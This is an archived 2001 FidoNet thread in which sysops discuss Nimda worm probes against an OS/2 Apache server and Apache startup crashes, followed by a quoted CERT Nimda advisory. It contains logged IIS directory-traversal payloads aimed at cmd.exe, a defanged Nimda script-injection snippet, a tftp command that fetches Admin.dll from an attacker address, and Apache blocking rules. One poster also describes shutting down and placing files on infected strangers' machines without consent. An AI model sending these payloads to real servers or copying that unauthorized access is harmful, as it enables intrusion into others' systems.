• Apache 1.3.22 up but?

    From Mike Luther@1:117/3001 to All on Tue Oct 30 02:20:48 2001
    Well, Apache 1.3.22 is up and running for test purposes at the already known 208.180.150.64 address for 1:117/3001 here as well as on some other boxen for research ..

    I stuck my, not-designed-to-ever-encourgage-web-traffic page mirrored on it for
    test purposes here on site. The idea being that it is still going to be far cheaper to eventually use the fixed IP address I'm stabilizing, or trying to, instead of pay my IP to host dis and dat.

    Well maybe ..

    Instantly .. about a quarter of a meg a day even on this DHCP address of logs similar to:

    208.180.150.64 - - [26/Oct/2001:20:00:00 +0000] "GET /apache_pb.gif
    HTTP/1.0" 200 2326
    208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
    /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET /MSADC/root.exe?/c+dir
    HTTP/1.0" 404 278
    208.180.221.87 - - [26/Oct/2001:20:15:49 +0000] "GET
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    208.180.221.87 - - [26/Oct/2001:20:15:50 +0000] "GET
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
    208.180.221.87 - - [26/Oct/2001:20:15:52 +0000] "GET
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    208.180.221.87 - - [26/Oct/2001:20:15:53 +0000] "GET
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 319
    208.180.221.87 - - [26/Oct/2001:20:15:55 +0000] "GET
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 319
    208.180.221.87 - - [26/Oct/2001:20:15:57 +0000] "GET
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 335
    208.180.221.87 - - [26/Oct/2001:20:16:07 +0000] "GET
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    208.180.221.87 - - [26/Oct/2001:20:16:08 +0000] "GET
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    208.180.221.87 - - [26/Oct/2001:20:16:10 +0000] "GET
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    208.180.221.87 - - [26/Oct/2001:20:16:14 +0000] "GET
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    208.180.221.87 - - [26/Oct/2001:20:16:15 +0000] "GET
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    208.180.221.87 - - [26/Oct/2001:20:16:17 +0000] "GET
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
    208.180.221.87 - - [26/Oct/2001:20:16:27 +0000] "GET
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
    208.180.221.87 - - [26/Oct/2001:20:16:28 +0000] "GET
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

    Of course all the 208.180.###.### are coming from my COX IP's dominion! But gee, maybe I ought to let them suffer instead of asking IJFIRE to dump dis and dat and having to constantly re-write the dump matrix stuff?

    I see where Mikey has more to learn.

    On a more practical note, Apache has one other disturbing error I've seen for the first time. I get very few trap errors on this old 1542C Adaptec SCSI box!
    Yes, it is tape backed, even so that it only hosts all the BBS and TELNET and FTP server stuff ... but ..

    Apache has this nice need to perform a graceful shutdown rather than just whatever. And there are short kill scripts to help both do that as well as perform a graceful re-start.

    But remember! This is the box I've had some of these curious hard locks with no trap errors which .. now more conclusively point to the CANARY portion of NORMAN 4.73 that is looking at the SYSTEM stuff on scan going into DOS-VDM sessions via the OS/2 .CMD file which runs things..

    One of them taught me a new lesson about APACHE 1.3.22 yesterday. If you abend
    the box and bring it up hard through CHKDSK, APACHE throws repeated SYS3175 after SYS3175 forever with the Desktop nearly locked if the TCP/IP interface is
    not up and running as the aut-load for the desktop attempts to rebuild the desktop from the crash. I quote:

    ------------------------------------------------------------

    10-29-2001 07:18:58 SYS3175 PID 0051 TID 0001 Slot 0077
    C:\APACHE\HTTPD.EXE
    c0000005
    1e4b51fc
    P1=00000001 P2=171b00d8 P3=XXXXXXXX P4=XXXXXXXX
    EAX=00000000 EBX=171b0080 ECX=00000001 EDX=00000000
    ESI=000321d4 EDI=0004ffec
    DS=0053 DSACC=f0f3 DSLIM=ffffffff
    ES=0053 ESACC=f0f3 ESLIM=ffffffff
    FS=150b FSACC=00f3 FSLIM=00000030
    GS=0000 GSACC=**** GSLIM=********
    CS:EIP=005b:1e4b51fc CSACC=f0df CSLIM=ffffffff
    SS:ESP=0053:0282fd8c SSACC=f0f3 SSLIM=ffffffff
    EBP=0282fd98 FLG=00012202

    LIBHTTPD.DLL 0001:000051fc

    I discovered that with a great deal of fanfare, I can intercept the building Desktop inbetween END, END, END, runs of the trap error message. One by one I can get all the BBS tasks and so on killed. Then inbetween the brief flashes of another SYS3175 error just like the above, I can open the APACHE folder, and
    then with work, slam in the KILL script which will properly terminate this beast!

    That is not good.

    Fine. I can go to use the RESTARTOBJECTSONLY game? Or maybe go to the method of restarting the entire Desktop and the WPS out of STARTUP folder? But I sure can't go to an auto-restart deal on a trap deal, can I? The box would forever get trapped in round after round of this!

    Knowing this now, early in the burn, How do I maintain the mission critical and especially REMOTE RESET capability of a box like this under this scenario?

    Any thought about using the KILL script as part of the .CMD file to fire off this beast on a STARTUP.CMD approach, then firing it off as a second step in that game?

    Equally important from an OS2INET standpoint, just what methodology does one use with our available OS/2 tools for net connectivity to keep a joint BBS and INET server presence up mission critical style?

    Inquiring mind wants to know.


    Sleep well; OS/2's still awake! ;)

    Mike @ 1:117/3001




    --- Maximus/2 3.01
    * Origin: Ziplog Public Port (1:117/3001)
  • From mark lewis@1:3634/12 to Mike Luther on Wed Oct 31 15:39:38 2001
    Instantly .. about a quarter of a meg a day even on this DHCP
    address of logs similar to:

    208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
    /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET /MSADC/root.exe?/c+dir
    HTTP/1.0" 404 278

    welcome to the world of the NIMDA worm attempting to infect your server <<GG>>
    there are a few tricks to handle this... however, the standard 404 page is ok, too... unless you can block on ip packet contents, this'll be with us for a while...

    Of course all the 208.180.###.### are coming from my COX IP's
    dominion! But gee, maybe I ought to let them suffer instead
    of asking IJFIRE to dump dis and dat and having to constantly
    re-write the dump matrix stuff?

    i'd be firing off reports to cos letting them know the address and what its doing... it should be up to them to determine who has that connection and notify them (as well as knocking them off the net until they get their stuff cleaned up and patched properly)...

    [trim]

    Equally important from an OS2INET standpoint, just what
    methodology does one use with our available OS/2 tools for net connectivity to keep a joint BBS and INET server presence up
    mission critical style?

    i let injoy start and stop my apache server when it connects and when i specifically click on the hangup button... other than that, if i have to get off the net, i simply unplug the phone line and stop injoy from dialing out... i use a script to determine if my apache is already up and if it is not, i start it... i also do this with my "DDNS" updater program...

    )\/(ark


    * Origin: (1:3634/12)
  • From Mike Luther@1:117/3001 to Mark Lewis on Thu Nov 1 02:00:22 2001
    Thanks, Mark ...

    welcome to the world of the NIMDA worm attempting to infect your server
    <<GG>> there are a few tricks to handle this...
    however, the standard 404 page is ok, too... unless
    you can block on ip packet contents, this'll be with
    us for a while...

    I have a worse introduction than this, though. Port 137/138 to Port 139 versions of this Nimda.# worm *CAN* get to an OS/2 TCPBUIE box. That's another
    on-going research project I've not had time to finish yet as to whether or not there really is a hole on OS/2 NETBIOS. Too much to do yet to set up the test pair of computers across my IP to do the work, groan. But I've already had two infestations of all the files on one box until I too out Port 80 with IJFIRE until I could do something more specific.

    Well, I think IJFIRE's ruleset can be used to block on packet contents. Thus I supposed, but haven't been down this pig trail, that one has to write the rulebase for each such thingy, down to the point where there is a common string
    content for that. In this case, what I think you are saying is that I have to think out writing the 'rule' for it. I have to either ue the .CFG rulebase or filter based on the packet content for what would be an INSTR or similar sort of mid character array. That could be on the:

    208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
    /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET
    /MSADC/root.exe?/c+dir
    HTTP/1.0" 404 278

    -----> GET/MSADC/root.exe?/

    right? Since I don't have such, it's common to those two hits, IJFIRE is told to simply drop them, right? I at first thought that it would be a simple matter to block it on the basis of packet type. But now that I look at how it is done, I think I've learned that won't work. Hold this thought for a moment for log comments below.

    i'd be firing off reports to cos letting them know the address and what its doing... it should be up to them to determine who
    has that connection and notify them (as well as
    knocking them off the net until they get their stuff
    cleaned up and patched properly)...

    You can do that by filing the logs with abuse@cox-internet.com as I actually did for the two sites that did get in using a twisted Port 137/138 morphed ot Port 139 game somehow.

    i let injoy start and stop my apache server when it connects and when i specifically click on the hangup button... other than
    that, if i have to get off the net, i simply unplug
    the phone line and stop injoy from dialing out... i
    use a script to determine if my apache is already up
    and if it is not, i start it... i also do this with my
    "DDNS" updater program...

    Well, from the SYS3175's that Apache 1.3.22 throws, apparently when the Desktop
    trys to rebuild itself on a botched shutdown, I think what you really need to do might be to force a graceful shutdown before the thing is loaded each time!
    You would modify the normal startup to do that. The SHUTDOWN.CMD which is really a REXX script is:

    /* Rexx script to shut down Apache */

    pid = linein("logs\httpd.pid")
    'kill.exe -TERM 'pid

    It can be run over and over again if it isn't running with no abend. Thus whay
    can't you just use that prior to each load and when the desktop goes to autorebuild, it gets properly terminated? If you use an error trap routine in REXX unless you get a null return for the loader line it just rolls aroun to the script start until the IP comes back clean?

    I'm cable hosted. I can't just yank the phone line if I'M not here and something goes bad wrong that someone else can only fix by pushing the reset box on a locked box!

    Sleep well; OS/2's still awake! ;)

    Mike @ 1:117/3001

    --- Maximus/2 3.01
    * Origin: Ziplog Public Port (1:117/3001)
  • From Mike Luther@1:117/3001 to Mark Lewis on Fri Nov 2 13:25:30 2001
    More learning from Mark! Thank you so much for sharing...

    I have a worse introduction than this, though. Port 137/138
    to Port 139 versions of this Nimda.# worm *CAN* get to an OS/2
    TCPBUIE box.

    those ports are normal netbeui/netbios over tcp/ip stuff, AFAIK... i don't know what is used in a non-tcp/ip configuration
    for netbeui/netbios...

    Nor I.

    uuuggghhh... and here i sit behind injoy v2.0b with
    nothing else between that box and the net... have that
    apache/2 1.3.22 server running and a couple of
    aliasmatch statements in httpd.conf to at least send
    something i want to send back... in fact, my stuff has
    a bit more output than many because i fully expect
    that some stuff may be being sent manually by a person
    attempting to hack in themselves...

    Interesting.

    here's those aliasmatch statements...

    Snipped for bandwidth but put into the keep and learn how to do this!

    you might also find this one useful...

    Ditto.

    RedirectMatch (.*).ico$ http://www.microsoft.com$1.ico

    # That one liner above will redirect all ".ico" request from
    # your server to the Microsoft server. Now you'll be letting
    # their damm server deal with the errors and bandwidth. It
    # will NOT interupt your traffic at all! If MS is going to
    # request files from your server, it's only appropriate that
    # they deal with the problems they cause...

    Mmm . Mint Cookies, saved in notebook! Gee how little I know, And I never really wanted to .. oh well. Such is life! ;)

    right?

    yes, pretty much... i think i'd trap on
    "/path/root.exe" and each of the others... in
    otherwords, just shorten it enough to get just that
    stuff without having to parse too much... it really
    should be enough to let apache handle it but it is
    possible that one may see 1000+ hits per second from
    NIMDAs all over the first two ip octets you're in...

    I think I know enough to begin writing here... Trying to triage all this into what is most proactical (I'll leave you to figure out about four terrible pun relationships in that coineed word!) at this point!

    yes, that should work... hopefully ijfire won't get
    bogged down trying to handle the possible high numbers
    of hits or even get taken out, itself...

    I've read into that this can happen but hav no information on what the chances are based on this level of attack rates.

    ok... i'll add that address to my abuse addresses list... don't know
    that i'll need it unless i get hit from there during
    one/some of the random ip number generation attacks
    that nimda uses... in many cases, i've been able to
    hop over to one of the windows boxes, here, and smack
    that attacking machine right off the entire network...

    How delicate!

    it's quite easy when you can use the windows sdk (i
    think) shutdown.exe program(s) and tell it to shutdown
    \\ipnumber\ipc$ (or whatever its called)... i've even
    had some luck in placing patches and such on those
    machines along with a text file in the startup folder
    that tells them when they turn the machine back on why
    it went down, where to locate the placed patches and
    how to do it... even going so far as to specifically
    tell them they HAVE to unplug the network wire during
    the process so that they're not attacking or being attacked during the patching process... in a few cases, i've even called
    them on the phone and talked to them directly telling
    them who i was, what i was doing, and why... you
    should hear some of their comments when i tell them
    certain steps (like placing a file in a certain place
    and they see it pop into existance via drag and drop
    from my desktop! or when i send the shutdown command)
    that i'm doing... there are times that i really wish
    that i could see and capture their facial
    expressions...

    Sorry for my twisted humor personality, but you remember back when I think it was Jack Lemmon played the Devil, had turned this poor soul into a parrot? He didn't like it's looks, so he wrenched the beak around qrotesquely, looked at it with a tilted head like a parrot does, and then commented out of the side of
    his mouth, "Definitely Piccasso!" ;)


    i let injoy start and stop my apache server when it
    connects and when i specifically click on the hangup
    button... other than that, if i have to get off the
    net, i simply unplug the phone line and stop injoy
    from dialing out... i use a script to determine if my
    apache is already up and if it is not, i start it...
    i also do this with my "DDNS" updater program...

    that may very well be... i dunno... my system has gone down the hard way when the UPS batteries have run out of power but i've
    never had this problem because injoy hasn't dialed out
    and connected until after the stuff has been rebuilt

    I can reason this load-linee out mentally..

    or whatever... i guess it may also help that that box
    runs quite a few tasks all the time... from a clean
    boot, CTRL-ESC shows twenty-three (23) tasks running
    and those are running all the time as that machine's
    server ops that i employ here...

    But in this case, we're dealing with a problem, I think, at core level in the Kernel that sneaked in here at W40508 level. It wasn't there for the original level of FP 15. Showed up when I upgraded the Kernel only. I didn't get it caught in time and figured out to report it in Testcase officially. In the couple of months it took me isolate a trap like this that doesn't even trap the
    box and leaves no way to trace it, things went far forward from W40508. Plus, who in heck wants to work with the Adaptec 1542C level cards which is the only place I see it? As well, I'm not at all sure the Kernel is really even the cause, as I've sorta now pinned it on the SYSTEM checking CANARY deal from Norman in conjunction with this.

    To date Norman hasn't even answered the support help request... ;(

    But with the /bs- option in the command line loads I use, and full semaphore and hand flag files created for SCANBLDP to keep more than one task at a time from hitting the same messaage area, the lock seems gone.

    I'm cable hosted. ....

    uuugh... that does toss in a bit of a sticky wicket,
    eh? hummm... maybe you can run some sort of monitor
    that checks that tcp/ip is up and operational before
    apache is launched... you don't think it could be an
    EMX thing failing, do you? what level are you at with
    EMX and are you using the runtime only or the
    development??

    I'm at current level 4.09 as I recall. It reports, I think, 61 in the version dump screen. I'm also using the full development game, but really don't need that for this box. It's just easier to set up and dump in a common format for stuff like this everywhere than do this on one box and that on another.

    Thanks,

    This one showed up directly here on OS2INET by the way.

    Sleep well; OS/2's still awake! ;)

    Mike @ 1:117/3001

    --- Maximus/2 3.01
    * Origin: Ziplog Public Port (1:117/3001)
  • From mark lewis@1:3634/12 to Mike Luther on Fri Nov 2 10:08:10 2001
    welcome to the world of the NIMDA worm attempting
    to infect your server <<GG>> there are a few
    tricks to handle this... however, the standard 404
    page is ok, too... unless you can block on ip
    packet contents, this'll be with us for a while...

    I have a worse introduction than this, though. Port 137/138
    to Port 139 versions of this Nimda.# worm *CAN* get to an OS/2
    TCPBUIE box.

    those ports are normal netbeui/netbios over tcp/ip stuff, AFAIK... i don't know
    what is used in a non-tcp/ip configuration for netbeui/netbios...

    That's another on-going research project I've
    not had time to finish yet as to whether or not there really
    is a hole on OS/2 NETBIOS. Too much to do yet to set up the
    test pair of computers across my IP to do the work, groan. But
    I've already had two infestations of all the files on one box
    until I too out Port 80 with IJFIRE until I could do something
    more specific.

    uuuggghhh... and here i sit behind injoy v2.0b with nothing else between that box and the net... have that apache/2 1.3.22 server running and a couple of aliasmatch statements in httpd.conf to at least send something i want to send back... in fact, my stuff has a bit more output than many because i fully expect that some stuff may be being sent manually by a person attempting to hack in themselves...

    here's those aliasmatch statements...

    # these are to "stop" stupid attempts to use windows expolits on us
    AliasMatch (.*)\cmd.exe "z:/apache/htdocs/idiots/index.html"
    AliasMatch (.*)\root.exe "z:/apache/htdocs/idiots/index.html"
    AliasMatch (.*)\admin.dll "z:/apache/htdocs/idiots/index.html"
    AliasMatch (.*)\default.ida "z:/apache/htdocs/idiots/index.html"

    i have these within the <IfModule mod_alias.c> container so that they are only loaded if the mod_alias module is loaded...

    you might also find this one useful...

    # Those of you who have seen the "file not found" /favicon.ico
    # (for example) in your Apache error logs should listen here.
    # All you have to do is add this line to your httpd.conf.
    # I hate Microsoft IE 5. The supplied regular expression is
    # matched against the URL, and if it matches, the server will
    # substitute any parenthesized matches into the given string
    # and use it as a filename. That will teach them.

    RedirectMatch (.*).ico$ http://www.microsoft.com$1.ico

    # That one liner above will redirect all ".ico" request from
    # your server to the Microsoft server. Now you'll be letting
    # their damm server deal with the errors and bandwidth. It
    # will NOT interupt your traffic at all! If MS is going to
    # request files from your server, it's only appropriate that
    # they deal with the problems they cause...

    Well, I think IJFIRE's ruleset can be used to block on packet
    contents. Thus I supposed, but haven't been down this pig
    trail, that one has to write the rulebase for each such
    thingy, down to the point where there is a common string
    content for that. In this case, what I think you are saying
    is that I have to think out writing the 'rule' for it. I have
    to either ue the .CFG rulebase or filter based on the packet
    content for what would be an INSTR or similar sort of mid
    character array. That could be on the:

    208.180.221.87 - - [26/Oct/2001:20:15:43 +0000] "GET
    /scripts/root.exe?/c+dir HTTP/1.0" 404 280
    208.180.221.87 - - [26/Oct/2001:20:15:44 +0000] "GET
    /MSADC/root.exe?/c+dir
    HTTP/1.0" 404 278

    -----> GET/MSADC/root.exe?/

    right?

    yes, pretty much... i think i'd trap on "/path/root.exe" and each of the others... in otherwords, just shorten it enough to get just that stuff without having to parse too much... it really should be enough to let apache handle it but it is possible that one may see 1000+ hits per second from NIMDAs all over the first two ip octets you're in...

    Since I don't have such, it's common to those two
    hits, IJFIRE is told to simply drop them, right?

    yes, that should work... hopefully ijfire won't get bogged down trying to handle the possible high numbers of hits or even get taken out, itself...

    I at first thought that it would be a simple matter to block
    it on the basis of packet type. But now that I look at how
    it is done, I think I've learned that won't work. Hold this
    thought for a moment for log comments below.

    'k...

    i'd be firing off reports to cos letting them know
    the address and what its doing... it should be up
    to them to determine who has that connection and
    notify them (as well as knocking them off the net
    until they get their stuff cleaned up and patched
    properly)...

    You can do that by filing the logs with abuse@cox-internet.com
    as I actually did for the two sites that did get in using a
    twisted Port 137/138 morphed ot Port 139 game somehow.

    ok... i'll add that address to my abuse addresses list... don't know that i'll need it unless i get hit from there during one/some of the random ip number generation attacks that nimda uses... in many cases, i've been able to hop over
    to one of the windows boxes, here, and smack that attacking machine right off the entire network... it's quite easy when you can use the windows sdk (i think) shutdown.exe program(s) and tell it to shutdown \\ipnumber\ipc$ (or whatever its called)... i've even had some luck in placing patches and such on those machines along with a text file in the startup folder that tells them when they turn the machine back on why it went down, where to locate the placed
    patches and how to do it... even going so far as to specifically tell them they
    HAVE to unplug the network wire during the process so that they're not attacking or being attacked during the patching process... in a few cases, i've
    even called them on the phone and talked to them directly telling them who i was, what i was doing, and why... you should hear some of their comments when i
    tell them certain steps (like placing a file in a certain place and they see it
    pop into existance via drag and drop from my desktop! or when i send the shutdown command) that i'm doing... there are times that i really wish that i could see and capture their facial expressions...

    i let injoy start and stop my apache server when it
    connects and when i specifically click on the hangup
    button... other than that, if i have to get off the
    net, i simply unplug the phone line and stop injoy
    from dialing out... i use a script to determine if my
    apache is already up and if it is not, i start it...
    i also do this with my "DDNS" updater program...

    Well, from the SYS3175's that Apache 1.3.22 throws, apparently
    when the Desktop trys to rebuild itself on a botched shutdown,
    I think what you really need to do might be to force a
    graceful shutdown before the thing is loaded each time!

    that may very well be... i dunno... my system has gone down the hard way when the UPS batteries have run out of power but i've never had this problem because
    injoy hasn't dialed out and connected until after the stuff has been rebuilt or
    whatever... i guess it may also help that that box runs quite a few tasks all the time... from a clean boot, CTRL-ESC shows twenty-three (23) tasks running and those are running all the time as that machine's server ops that i employ here...

    [trim]

    I'm cable hosted. I can't just yank the phone line if
    I'M not here and something goes bad wrong that someone
    else can only fix by pushing the reset box on a locked
    box!

    uuugh... that does toss in a bit of a sticky wicket, eh? hummm... maybe you can
    run some sort of monitor that checks that tcp/ip is up and operational before apache is launched... you don't think it could be an EMX thing failing, do you?
    what level are you at with EMX and are you using the runtime only or the development??

    )\/(ark


    * Origin: (1:3634/12)
  • From mark lewis@1:3634/12 to Mike Luther on Sat Nov 3 05:25:54 2001
    here's that CERT advisory on NIMDA in case you haven't seen it... it may help you to understand how the shares infection has been getting in... it'll definitely awaken you to everything that NIMDA does <<GG>> i note that i'm at 500+ lines during this writting... apologies to "fred sanford" -- "It's the BIG
    one, Mike!!" i've placed a few of my own comments within []'s and not worried about textlink translation... one can access this page on CERT/CC's site for that info if they like... watch the wordwrapping! some links contained herein are pretty long for these text only displays...

    ===== quoting http://www.cert.org/advisories/CA-2001-26.html =====

    CERTr Advisory CA-2001-26 Nimda Worm

    Original release date: September 18, 2001
    Revised: September 25, 2001
    Source: CERT/CC

    A complete revision history is at the end of this file.


    Systems Affected

    Systems running Microsoft Windows 95, 98, ME, NT, and 2000


    Overview

    The CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm appears to spread by multiple mechanisms:

    1. from client to client via email

    2. from client to client via open network shares

    3. from web server to client via browsing of
    compromised web sites

    4. from client to web server via active scanning
    for and exploitation of various Microsoft IIS
    4.0 / 5.0 directory traversal vulnerabilities
    (VU#111677 and CA-2001-12)

    5. from client to web server via scanning for the
    back doors left behind by the "Code Red II"
    (IN-2001-09), and "sadmind/IIS" (CA-2001-11)
    worms

    The worm modifies web documents (e.g., .htm, .html, and .asp files) and certain
    executable files found on the systems it infects, and creates numerous copies of itself under various file names.

    We have also received reports of denial of service as a result of network scanning and email propagation.


    I. Description

    The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000.


    Email Propagation

    This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable.

    Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded
    MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.

    The email message delivering the Nimda worm appears to also have the following characteristics:

    1. The text in the subject line of the mail
    message appears to be variable.

    2. There appear to be many slight variations
    in the attached binary file, causing the MD5
    checksum to be different when one compares
    different attachments from different email
    messages. However, the file length of the
    attachment appears to consistently be 57344
    bytes.

    3. The worm also contains code that will attempt
    to resend the infected email messages every 10
    days.


    Payload

    The email addresses targeted for receiving the worm are harvested from two sources

    1. the .htm and .html files in the user's web
    cache folder

    2. the contents of the user's email messages
    retrieved via the MAPI service

    These files are passed through a simple pattern matcher which collects strings that look like email addresses. These addresses then receive a copy of the worm
    as a MIME-encoded email attachment. Nimda stores the time the last batch of emails were sent in the Windows registry, and every 10 days will repeat the process of harvesting addresses and sending the worm via email.

    Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:

    50% of the time, an address with the same
    first two octets will be chosen

    25% of the time, an address with the same
    first octet will be chosen

    25% of the time, a random address will be
    chosen

    The infected client machine attempts to transfer a copy of the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable.

    Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml). When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended to every one of these web-related files:
    [modified here slightly so as to not trigger]

    <$cript language="javascript">
    w!ndow.open("readme.eml", null, "resizable=no,top=6000,left=6000")
    </$cript>

    This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system.

    In order to further expose the machine, the worm enables the sharing of the c: drive as C$ creates a "Guest" account on Windows NT and 2000 systems adds this account to the "Administrator" group.
    [i've also seen d: drive as D$ and e: as E$]

    Furthermore, the Nimda worm infects existing binaries on the system by creating
    Trojan horse copies of legitimate applications. These Trojan horse versions of the applications will first execute the Nimda code (further infecting the system and potentially propagating the worm), and then complete their intended function.


    Browser Propagation

    As part of the infection process, the Nimda worm modifies all web content files
    it finds (including, but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system.
    [i've seen netscape actually open and save the file in its cache directory or the %TEMP% directory. simply deleting the file is sufficient. its plain text containing a MIME encoded file.]


    File System Propagation

    The Nimda worm creates numerous MIME-encoded copies of itself (using file names
    with .eml and .nws extensions) in all writable directories (including those found on a network share) to which the user has access. If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer with the preview option enabled, the worm may be able
    to compromise that system.

    Additionally, by creating Trojan horse versions of legitimate applications already installed on the system, users may unknowingly trigger the worm when attempting to make use of these programs.


    System FootPrint

    The scanning activity of the Nimda worm produces the following log entries for any web server listing on port 80/tcp:

    GET /scripts/root.exe?/c+dir
    GET /MSADC/root.exe?/c+dir
    GET /c/winnt/system32/cmd.exe?/c+dir
    GET /d/winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
    GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
    GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
    GET /msadc/..%5c../..%5c../..%5c/..\xc 1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

    Note: The first four entries in these sample logs denote attempts to connect to
    the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.


    II. Impact

    Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. In the case where a client is compromised, the worm will be run with the same privileges as the user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites.

    The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines.


    III. Solutions

    Recommendations for System Administrators of IIS machines

    To determine if your system has been compromised, look for the following:

    a root.exe file (indicates a compromise by Code Red II
    or sadmind/IIS worms making the system vulnerable to the
    Nimda worm)

    an Admin.dll file in the root directory of c:\, d:\, or
    e:\ (Note that the file name Admin.dll may be legitimately
    installed by IIS in other directories.)

    unexpected .eml or .nws files in numerous directories

    the presence of this string:

    /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200

    in the IIS logs, where "x.x.x.x" is the IP address of the
    attacking system. (Note that only the "200" result code
    indicates success of this command.)

    The only safe way to recover from the system compromise is to format the system
    drive(s) and reinstall the system software from trusted media (such as vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied security patches must be applied. The recommended time to do this is while the system is not connected to any network. However, if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet.

    Detailed instructions for recovering your system can be found in the CERT/CC tech tip:

    Steps for Recovering from a UNIX or NT System Compromise


    Apply the appropriate patch from your vendor

    A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from Microsoft at

    http://www.microsoft.com/technet/security/bulletin/MS01-044.asp


    Recommendations for Network Administrators

    Ingress filtering

    Ingress filtering manages the flow of traffic as it enters a network under your
    administrative control. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authortized services. With Nimda, ingress filtering of port 80/tcp could prevent instances of the worm outside of your network from
    scanning or infecting vulnerable IIS servers in the local network that are not explicitly authorized to provide public web services. Filtering of port 69/udp will also prevent the downloading of the worm to IIS via tftp.

    Cisco has published a tech tip specifically addressing filtering guidelines to mitigate the impact of the Nimda worm at

    http://www.cisco.com/warp/public/63/nimda.shtml


    Egress filtering

    Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of Nimda, employing egress filtering on port 69/udp at your network border will
    prevent certain aspects of the worms propogation both to and from your network.


    Recommendations for End User Systems

    Apply the appropriate patch from your vendor

    If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends upgrading to at least version 5.0 since older versions are no longer
    officially maintained by Microsoft. Users of IE 5.0 and above are encourage to apply patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at

    http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

